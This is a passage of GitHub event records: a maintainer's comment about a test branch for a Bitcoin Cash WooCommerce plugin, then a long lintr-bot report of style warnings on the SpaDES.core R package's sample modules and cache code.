{"id":"7984462816","type":"CommitCommentEvent","actor":{"login":"sanchaz"},"repo":{"name":"sanchaz/bitcoin-cash-payments-for-woocommerce"},"payload":{"comment":{"id":29753557,"position":null,"line":null,"path":null,"commit_id":"518783339a0d478fbbd75eaea251f71d64b01860","created_at":"2018-07-18T17:41:52Z","updated_at":"2018-07-18T17:41:52Z","author_association":"OWNER","body":"@acidsploit @zanza321 \r\nI've done these changes. You can also upload more to the folder if you don't like these.\r\nIt's currently not merged but you can find it in this branch, please use only for testing until it is merged to master, unless you test it yourself before.\r\nhttps://github.com/sanchaz/bitcoin-cash-payments-for-woocommerce/tree/selectable_checkout_icon\r\n"}},"created_at":"2018-07-18T17:41:52Z"}
{"id":"7984463151","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29753559,"position":null,"line":null,"path":null,"commit_id":"4334935323c75ef567a084d0abe54a7187d36bd7","created_at":"2018-07-18T17:41:55Z","updated_at":"2018-07-18T17:41:55Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:413:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/cache.R#L413) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #   makes soft copy of all objects, i.e., they have the identical objects, which are pointers only\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:441:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/cache.R#L441) *style:* **Lines should not be more than 100 characters.**\n```r\n​        list2env(mget(lsObjectEnv[lsObjectEnv %in% createOutputs | lsObjectEnv %in% expectsInputs], envir = object@.envir), envir = object2@.envir)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:451:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/cache.R#L451) *style:* **Commented code should be removed.**\n```r\n​          #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:455:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/cache.R#L455) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # This is for objects that are not in the return environment yet because they are unrelated to the\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:468:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/cache.R#L468) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:472:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/cache.R#L472) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        